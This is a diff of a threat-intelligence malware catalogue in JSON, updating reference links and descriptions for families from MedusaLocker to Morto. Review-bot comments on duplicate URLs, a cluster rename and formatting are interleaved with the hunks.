"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.bleepingcomputer.com/news/security/allied-universal-breached-by-maze-ransomware-stolen-data-leaked/", + "https://securelist.com/maze-ransomware/99137/", + "https://www.bleepingcomputer.com/news/security/maze-ransomware-now-encrypts-via-virtual-machines-to-evade-detection/", + "https://www.telsy.com/wp-content/uploads/Maze_Vaccine.pdf", + "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel", + "https://www.brighttalk.com/webcast/7451/408167/navigating-maze-analysis-of-a-rising-ransomware-threat", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", + "http://www.secureworks.com/research/threat-profiles/gold-village", + "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://id-ransomware.blogspot.com/2019/05/chacha-ransomware.html", + "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/" ], "synonyms": [ "ChaCha" 
@@ -21174,18 +24156,21 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusalocker",
 "http://id-ransomware.blogspot.com/2019/10/medusalocker-ransomware.html",
 "https://blog.talosintelligence.com/2020/04/medusalocker.html",
- "https://www.cybereason.com/blog/medusalocker-ransomware",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
+ "https://twitter.com/siri_urz/status/1215194488714346496?s=20",
 "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/",
+ "https://www.carbonblack.com/2020/06/03/tau-threat-analyis-medusa-locker-ransomware/",
 "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
 "https://dissectingmalwa.re/try-not-to-stare-medusalocker-at-a-glance.html",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.carbonblack.com/2020/06/03/tau-threat-analyis-medusa-locker-ransomware/",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
 "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
 "https://id-ransomware.blogspot.com/2020/01/ako-ransomware.html",
- "https://twitter.com/siri_urz/status/1215194488714346496?s=20",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/"
+ "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
+ "https://www.cybereason.com/blog/medusalocker-ransomware",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/"
 ],
 "synonyms": [
 "AKO Doxware",
@@ -21213,6 +24198,7 @@
 "https://news.sophos.com/en-us/2019/05/03/megacortex-ransomware-wants-to-be-the-one/",
 "https://www.bleepingcomputer.com/news/security/fbi-issues-alert-for-lockergoga-and-megacortex-ransomware/",
 "https://threatpost.com/megacortex-ransomware-mass-distribution/146933/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/",
 "https://www.bleepingcomputer.com/news/security/new-megacortex-ransomware-changes-windows-passwords-threatens-to-publish-data/",
 "https://www.computing.co.uk/ctg/news/3084818/warning-over-lockergoga-and-megacortex-ransomware-attacks-targeting-private-industry-in-western-countries",
 "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/"
@@ -21241,8 +24227,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.mekotio",
+ "https://www.welivesecurity.com/2020/08/13/mekotio-these-arent-the-security-updates-youre-looking-for/",
+ "http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853",
 "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/rooty-dolphin-uses-mekotio-to-target-bank-clients-in-south-america-and-europe/",
- "https://www.welivesecurity.com/2020/08/13/mekotio-these-arent-the-security-updates-youre-looking-for/"
+ "https://therecord.media/spain-arrests-16-for-distributing-the-mekotio-and-grandoreiro-banking-trojans/"
 ],
 "synonyms": [],
 "type": []
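Review bot: The MedusaLocker refs end up citing the CrowdStrike double-trouble part-1 post twice, because this hunk adds `"https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",` near the top of the array and then re-adds the trailing-slash form `"https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",` near the bottom. Drop the slash-less line; both resolve to the same page. The Maze refs above, whose hunk begins before this chunk, pick up the same slash/no-slash pair, plus the GOLD VILLAGE profile under both http and https and a FireEye post that was already present as context, which suggests the list merge does not normalise URLs before comparing them. A dedupe that compares scheme-stripped, trailing-slash-stripped URLs before the cluster is written would catch all of these.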
@@ -21283,15 +24271,25 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.mespinoza",
- "https://dissectingmalwa.re/another-one-for-the-collection-mespinoza-pysa-ransomware.html",
+ "https://blogs.blackberry.com/en/2021/06/pysa-loves-chachi-a-new-golang-rat",
+ "https://www.ic3.gov/Media/News/2021/210316.pdf",
+ "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/",
+ "https://www.cybereason.com/blog/threat-analysis-report-inside-the-destructive-pysa-ransomware",
 "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "http://www.secureworks.com/research/threat-profiles/gold-burlap",
 "https://www.zdnet.com/article/france-warns-of-new-ransomware-gang-targeting-local-governments/",
 "https://id-ransomware.blogspot.com/2019/10/mespinoza-ransomware.html",
- "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/",
+ "https://dissectingmalwa.re/another-one-for-the-collection-mespinoza-pysa-ransomware.html",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
 "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
 "https://www.cert.ssi.gouv.fr/cti/CERTFR-2020-CTI-002/",
- "https://twitter.com/campuscodi/status/1347223969984897026"
+ "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
+ "https://www.lacework.com/blog/pysa-ransomware-gang-adds-linux-support/",
+ "https://twitter.com/campuscodi/status/1347223969984897026",
+ "https://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/",
+ "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/"
 ],
 "synonyms": [
 "pysa"
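Review bot: The bare Google Sheets link `"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",` added to the Mespinoza refs gives a reader no way to tell what it documents or who maintains it, and the sheet can be edited or withdrawn by its owner at any time, so the citation is neither self-describing nor stable. The same link is added in the MedusaLocker hunk above and the Mount Locker hunk below. A web.archive.org snapshot of the sheet, or the post that published it, would keep the reference verifiable. Separately, `"http://www.secureworks.com/research/threat-profiles/gold-burlap",` uses plain http while the neighbouring Secureworks links in this diff use https; normalising the scheme at import time avoids the scheme-only duplicates seen elsewhere in this diff.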
@@ -21302,7 +24300,7 @@
 "value": "Mespinoza"
 },
 {
- "description": "",
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.metadatabin",
@@ -21314,7 +24312,7 @@
 "type": []
 },
 "uuid": "750c5b2c-1489-4e11-b21d-c49b651d9227",
- "value": "MetadataBin Ransomware"
+ "value": "MetadataBin"
 },
 {
 "description": "",
@@ -21344,12 +24342,14 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.metamorfo",
+ "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
 "https://www.bitdefender.com/files/News/CaseStudies/study/333/Bitdefender-PR-Whitepaper-Metamorfo-creat4500-en-EN-GenericUse.pdf",
 "https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/metamorfo.md",
 "https://blog.ensilo.com/metamorfo-avast-abuser",
 "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-Soucek-Hornak-DemystifyingBankingTrojansFromLatinAmerica.pdf",
- "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
+ "https://cofense.com/blog/autohotkey-banking-trojan/",
 "https://blog.talosintelligence.com/2018/11/metamorfo-brazilian-campaigns.html",
+ "https://twitter.com/MsftSecIntel/status/1418706916922986504",
 "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html",
 "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767"
 ],
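Review bot: Renaming `"value": "MetadataBin Ransomware"` to `"value": "MetadataBin"` changes the cluster's display name, and because MISP builds galaxy tags from the value (`misp-galaxy:malpedia="…"`), events already tagged with the old name will no longer map to this cluster even though the uuid is unchanged. If the rename is intended, keep the old name reachable by listing it in the entry's `synonyms` array, e.g. `"MetadataBin Ransomware"`, so the mapping survives. The MrDec hunk near the end of this chunk makes the same rename and needs the same treatment.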
@@ -21361,22 +24361,44 @@
 "uuid": "18dc3e7a-600d-4e5f-a283-86156b938530",
 "value": "Metamorfo"
 },
+ {
+ "description": "A wiper used in an attack against the Iranian train system.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.meteor",
+ "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll/",
+ "https://threatpost.com/novel-meteor-wiper-used-in-attack-that-crippled-iranian-train-system/168262/",
+ "https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "066250ee-9279-47ad-b289-e266ede11921",
+ "value": "Meteor"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.meterpreter",
+ "https://asec.ahnlab.com/ko/26705/",
 "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md",
 "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf",
 "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a",
+ "https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/",
+ "https://www.recordedfuture.com/chinese-group-calypso-exploiting-microsoft-exchange/",
+ "https://blog.lumen.com/no-longer-just-theory-black-lotus-labs-uncovers-linux-executables-deployed-as-stealth-windows-loaders/",
 "https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/",
 "https://redcanary.com/blog/getsystem-offsec/",
 "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf",
 "https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/",
 "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf",
+ "https://www.countercraftsec.com/blog/post/shellcode-detection-using-realtime-kernel-monitoring/",
 "https://blog.morphisec.com/fin7-attacks-restaurant-industry",
+ "http://www.secureworks.com/research/threat-profiles/gold-franklin",
 "http://schierlm.users.sourceforge.net/avevasion.html",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-301a"
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-301a",
+ "http://www.secureworks.com/research/threat-profiles/gold-winter"
 ],
 "synonyms": [],
 "type": []
@@ -21384,6 +24406,24 @@
 "uuid": "13a5c0ae-8e2d-4a38-8b6c-7d746e159991",
 "value": "Meterpreter (Windows)"
 },
+ {
+ "description": "A botnet that used Tor .onion links for C&C.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mevade",
+ "https://www.youtube.com/watch?v=FttiysUZmDw",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/sefnit-trojan-just/",
+ "https://blog.fox-it.com/2013/09/05/large-botnet-cause-of-recent-tor-network-overload/"
+ ],
+ "synonyms": [
+ "SBC",
+ "Sefnit"
+ ],
+ "type": []
+ },
+ "uuid": "3454bd71-29e1-498b-82d8-111aeadedee5",
+ "value": "Mevade"
+ },
 {
 "description": "",
 "meta": {
@@ -21401,7 +24441,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.mgbot",
- "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/"
+ "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/",
+ "https://twitter.com/GossiTheDog/status/1438500100238577670"
 ],
 "synonyms": [
 "BLame",
@@ -21437,6 +24478,19 @@
 "uuid": "6c09cc53-7160-47c6-8df8-3e0d42deb5a6",
 "value": "Micrass"
 },
+ {
+ "description": "Open-source lightweight backdoor for C2 communication. ",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.microbackdoor",
+ "https://github.com/cr4sh/microbackdoor"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "07c7b7dc-cec8-4542-b351-ce7d757812d7",
+ "value": "MicroBackdoor"
+ },
 {
 "description": "",
 "meta": {
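Review bot: The new MicroBackdoor entry's description carries a trailing space, `"Open-source lightweight backdoor for C2 communication. "`, which no other description in this diff has; consumers presumably render the string as-is, and the stray whitespace will reappear as a spurious change the next time the file is regenerated with trimming. Trim it to `"Open-source lightweight backdoor for C2 communication."`.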
@@ -21464,6 +24518,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.micropsia",
+ "https://about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf",
 "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/",
 "http://blog.talosintelligence.com/2017/06/palestine-delphi.html",
 "https://research.checkpoint.com/apt-attack-middle-east-big-bang/",
@@ -21488,6 +24543,19 @@
 "uuid": "87abb59d-0012-4d45-9e75-136372b25bf8",
 "value": "Mikoponi"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.milan",
+ "https://www.clearskysec.com/wp-content/uploads/2021/08/Siamesekitten.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "5b1fe92d-9a78-4543-8efb-7c674492d0d2",
+ "value": "Milan"
+ },
 {
 "description": "",
 "meta": {
@@ -21507,7 +24575,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.milum",
 "https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/",
- "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf"
+ "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
+ "https://securelist.com/wildpressure-targets-macos/103072/"
 ],
 "synonyms": [],
 "type": []
@@ -21521,26 +24590,37 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz",
 "https://blog.xpnsec.com/exploring-mimikatz-part-1/",
- "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
- "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/",
+ "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/",
+ "http://www.secureworks.com/research/threat-profiles/gold-burlap",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://www.secureworks.com/research/threat-profiles/gold-kingswood",
 "http://www.secureworks.com/research/threat-profiles/gold-kingswood",
+ "https://www.matteomalvica.com/blog/2020/01/30/mimikatz-lsass-dump-windg-pykd/",
+ "https://www.secureworks.com/research/samsam-ransomware-campaigns",
 "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
+ "https://www.ic3.gov/Media/News/2021/210527.pdf",
+ "https://www.ic3.gov/Media/News/2021/210823.pdf",
+ "https://www.rsa.com/content/dam/en/white-paper/the-shadows-of-ghosts-carbanak-report.pdf",
 "https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains",
 "https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/",
 "https://www.verfassungsschutz.de/download/broschuere-2021-01-bfv-cyber-brief-2021-01.pdf",
 "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html",
+ "http://www.secureworks.com/research/threat-profiles/gold-franklin",
 "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
 "https://www.ic3.gov/media/news/2020/200917-1.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
 "https://www.secureworks.com/research/threat-profiles/cobalt-hickman",
+ "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos",
 "https://www.slideshare.net/yurikamuraki5/active-directory-240348605",
 "https://github.com/gentilkiwi/mimikatz",
- "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/",
+ "https://ics-cert.kaspersky.com/media/KASPERSKY_Steganography_in_targeted_attacks_EN.pdf",
 "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/",
 "https://labs.f-secure.com/blog/catching-lazarus-threat-intelligence-to-real-detection-logic-part-two",
 "https://www.f-secure.com/content/dam/f-secure/en/consulting/our-thinking/collaterals/digital/f-secure-consulting-incident-readiness-proactive-response-guide-2020.pdf",
 "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf",
+ "https://news.sophos.com/en-us/2021/05/18/the-active-adversary-playbook-2021/?cmp=37153",
 "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf",
- "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/",
+ "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/",
 "https://twitter.com/swisscom_csirt/status/1354052879158571008",
 "https://www.secureworks.com/research/threat-profiles/gold-drake",
 "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf",
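Review bot: The Mimikatz refs keep the Secureworks GOLD KINGSWOOD profile twice, because this hunk adds `"https://www.secureworks.com/research/threat-profiles/gold-kingswood",` directly above the existing `"http://www.secureworks.com/research/threat-profiles/gold-kingswood",`; the https line is only being moved up from the end of the array (it is removed in the next hunk), so the pre-existing scheme-only duplicate survives the reshuffle. The next hunk then adds `"http://www.secureworks.com/research/threat-profiles/gold-drake",` while the https form of that profile is still present as context here, creating a second such pair. Keep one form per profile, the https one, and drop the http twins. The refs array continues past the end of this hunk.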
@@ -21551,26 +24631,40 @@
 "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
 "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/",
 "https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf",
+ "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection",
 "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers",
 "https://www.hvs-consulting.de/lazarus-report/",
+ "https://www.devo.com/blog/detect-and-investigate-hafnium-using-devo/",
+ "https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran",
 "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
 "http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle",
+ "https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html",
+ "http://www.secureworks.com/research/threat-profiles/gold-drake",
+ "https://www.secureworks.com/blog/ransomware-deployed-by-adversary",
+ "https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html",
 "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
 "https://www.zdnet.com/article/fbi-says-an-iranian-hacking-group-is-attacking-f5-networking-devices/",
 "https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html",
+ "https://ti.qianxin.com/blog/articles/Operation-OceanStorm:The-OceanLotus-hidden-under-the-abyss-of-the-deep/",
 "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
 "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf",
+ "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf",
 "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
- "https://www.matteomalvica.com/blog/2020/01/30/mimikatz-lsass-dump-windg-pykd/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/locked-loaded-and-in-the-wrong-hands-legitimate-tools-weaponized-for-ransomware-in-2021",
+ "https://www.accenture.com/us-en/blogs/security/ransomware-hades",
 "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
+ "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/",
 "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html",
- "https://ics-cert.kaspersky.com/media/KASPERSKY_Steganography_in_targeted_attacks_EN.pdf",
+ "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/",
 "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east",
 "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
 "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
+ "https://awakesecurity.com/blog/catching-the-white-stork-in-flight/",
 "https://www.secureworks.com/research/threat-profiles/tin-woodlawn",
- "https://www.secureworks.com/research/threat-profiles/gold-kingswood"
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware"
 ],
 "synonyms": [],
 "type": []
@@ -21583,10 +24677,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.minebridge",
+ "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/",
 "https://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures",
 "https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html",
- "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/",
 "https://blog.morphisec.com/minebridge-on-the-rise-sophisticated-delivery-mechanism",
+ "https://www.zscaler.com/blogs/security-research/demystifying-full-attack-chain-minebridge-rat",
 "https://www.bleepingcomputer.com/news/security/windows-finger-command-abused-by-phishing-to-download-malware/"
 ],
 "synonyms": [
@@ -21620,6 +24715,8 @@
 "https://www.circl.lu/files/tr-14/circl-analysisreport-miniduke-stage3-public.pdf",
 "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
 "https://www.fireeye.com/blog/threat-research/2013/02/its-a-kind-of-magic-1.html",
+ "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/",
+ "https://cybergeeks.tech/how-to-defeat-the-russian-dukes-a-step-by-step-analysis-of-miniduke-used-by-apt29-cozy-bear/",
 "https://www.secureworks.com/research/threat-profiles/iron-hemlock"
 ],
 "synonyms": [],
@@ -21673,6 +24770,20 @@
 "uuid": "2edd3051-b1b5-47f2-9155-8c97f791dfb7",
 "value": "Mirai (Windows)"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirrorblast",
+ "https://www.proofpoint.com/us/daily-ruleset-update-summary-20210924",
+ "https://frsecure.com/blog/the-rebol-yell-new-rebol-exploit/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "be347289-5ca5-4b49-b5ef-8443883736c1",
+ "value": "MirrorBlast"
+ },
 {
 "description": "",
 "meta": {
@@ -21707,6 +24818,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.mispadu",
 "https://www.welivesecurity.com/2019/11/19/mispadu-advertisement-discounted-unhappy-meal/",
+ "https://seguranca-informatica.pt/threat-analysis-the-emergent-ursa-trojan-impacts-many-countries-using-a-sophisticated-loader/",
 "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/mispadu-banking-trojan-resurfaces"
 ],
 "synonyms": [
@@ -21779,11 +24891,25 @@
 "uuid": "7132c1de-9a3f-4f08-955f-ab6f7a09e17d",
 "value": "Mocton"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.modirat",
+ "https://news.sophos.com/en-us/2020/09/24/email-delivered-modi-rat-attack-pastes-powershell-commands/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "1f36d78b-6f3d-469e-8a60-5ecaebe9d80a",
+ "value": "MoDi RAT"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.modpipe",
+ "https://www.foregenix.com/blog/modpipe-malware-has-a-new-module-that-siphons-payment-card-data",
 "https://www.welivesecurity.com/2020/11/12/hungry-data-modpipe-backdoor-hits-pos-software-hospitality-sector/"
 ],
 "synonyms": [],
@@ -21808,6 +24934,19 @@
 "uuid": "026d638b-cc51-4eff-97fc-d61215a1a70a",
 "value": "ModPOS"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mofksys",
+ "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/PE_MOFKSYS.A/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "818a9036-a74f-4017-af07-cba9a471b316",
+ "value": "Mofksys"
+ },
 {
 "description": "",
 "meta": {
@@ -21870,9 +25009,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.molerat_loader",
+ "https://www.proofpoint.com/us/blog/threat-insight/new-ta402-molerats-malware-targets-governments-middle-east",
 "http://www.clearskysec.com/iec/",
 "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf",
- "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/"
+ "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/",
+ "https://www.0ffset.net/reverse-engineering/malware-analysis/molerats-string-decryption/"
 ],
 "synonyms": [],
 "type": []
@@ -21939,6 +25080,19 @@
 "uuid": "3de9ccf5-4756-4c5b-9086-6664f5a9b761",
 "value": "MoriAgent"
 },
+ {
+ "description": "This tool is a passive backdoor which allows attackers to inspect all incoming traffic to the infected machine, filter out packets that are marked as designated for the malware and respond to them. This forms a covert channel over which attackers are able to issue shell commands and receive back their outputs.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.moriya",
+ "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "4dd511a6-be5f-40ae-9a9f-aaf354f7ea2e",
+ "value": "Moriya"
+ },
 {
 "description": "",
 "meta": {
@@ -21966,6 +25120,19 @@
 "uuid": "c931dc7d-9373-4545-911c-ad5589670c40",
 "value": "Morto"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
